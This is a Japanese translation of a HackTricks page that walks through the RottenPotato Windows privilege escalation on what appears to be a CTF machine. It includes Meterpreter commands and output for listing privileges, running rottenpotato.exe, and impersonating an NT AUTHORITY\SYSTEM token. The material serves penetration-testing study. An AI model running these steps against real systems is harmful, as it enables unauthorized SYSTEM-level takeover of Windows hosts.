hacktricks/windows-hardening/windows-local-privilege-escalation/rottenpotato.md

5.6 KiB
Raw Blame History

RottenPotato

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェックしてください!

HackTricksをサポートする他の方法:

このページの情報はこの投稿から抜粋されました

サービスアカウントは通常、特別な権限SeImpersonatePrivilegesを持っており、これを利用して権限を昇格させることができます。

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

このエクスプロイトがどのように機能するかの詳細については説明しません。上記の記事が私が説明するよりも遥かに優れています。

meterpreterで私たちの権限を確認しましょう

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
優れています。攻撃を実行するために必要な権限を持っているようです。`rottenpotato.exe`をアップロードしましょう。

meterpreterセッションに戻り、`incognito`拡張機能をロードします。
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
No tokens available

現在、偽装トークンが存在しないことがわかります。Rotten Potatoエクスプロイトを実行しましょう。

meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

トークンをすぐに偽装する必要があります。さもなければ、それは消えてしまいます。

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

成功SYSTEMシェルを取得し、root.txtファイルを掴むことができました

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック!

HackTricksをサポートする他の方法